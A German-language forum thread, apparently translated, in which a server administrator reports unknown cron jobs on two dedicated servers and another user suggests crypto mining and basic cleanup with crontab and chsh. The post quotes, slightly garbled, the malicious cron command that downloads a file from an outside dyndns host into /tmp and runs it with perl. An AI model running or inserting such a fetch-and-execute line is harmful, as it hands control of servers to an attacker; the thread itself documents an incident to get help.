Ich habe zwei dedizierte Server, die vor einigen Tagen begonnen haben, mir Benachrichtigungen über laufende unbekannte Cron-Jobs zu senden.
Auf beiden Servern habe ich Zweitkonten für meine Websites und der Hacker hat den Cron-Job für diese Konten geändert, nicht für Root. Ich denke also, dass sie „vielleicht“ nur eingeschränkten Zugriff haben.
Beide versuchen Folgendes auszuführen: cd /tmp;wgethttp://fastfoodz.dlinkddns.com/abc.txt;curl-Öhttp://fastfoodz.dlinkddns.com/abc.txt;perlabc.txt;rm -f abc*
Cronjob-Ausgabe vom ersten Server:
http://pastebin.com/m56ga6pp
Cronjob-Ausgabe vom zweiten Server:
http://pastebin.com/4utZ8agC
Das Seltsame ist, dass beide Server anscheinend gleichzeitig und mit derselben Methode gehackt wurden.
Hatte irgendjemand genau diese Art von Hack und kann mir eine Idee geben, wie er reingekommen ist und ob ich ihn ohne Neuinstallation entfernen kann?
Auf den Servern befinden sich zahlreiche Websites und die erste nutzt etwa 500 GB. Es würde viel Zeit in Anspruch nehmen, sie an einen anderen Ort zu verschieben und neu zu installieren.
Dank im Voraus!
Antwort1
Beim Betrachten der Pastebin-Ausgabe sieht es so aus, als würden die Cron-Jobs versuchen, Hashes zu generieren. Ich würde vermuten, dass die Person versucht, den Server als Teil eines Mining-Pools für eine Kryptowährung zu verwenden.
Für Einzelheiten darüber, wie er hereingekommen ist, benötigen wir verschiedene Protokolle. Sind Sie 100 % sicher, dass es nicht der Websitebesitzer war? Sie können den Cronjob ganz einfach entfernen mit.
crontab -e
Um zu verhindern, dass die Person sich erneut anmeldet, würde ich den Shell-Zugriff für den jeweiligen Benutzer deaktivieren, wenn es keinen Grund dafür gibt, dass er ihn benötigt.
chsh -s /sbin/nologin {username}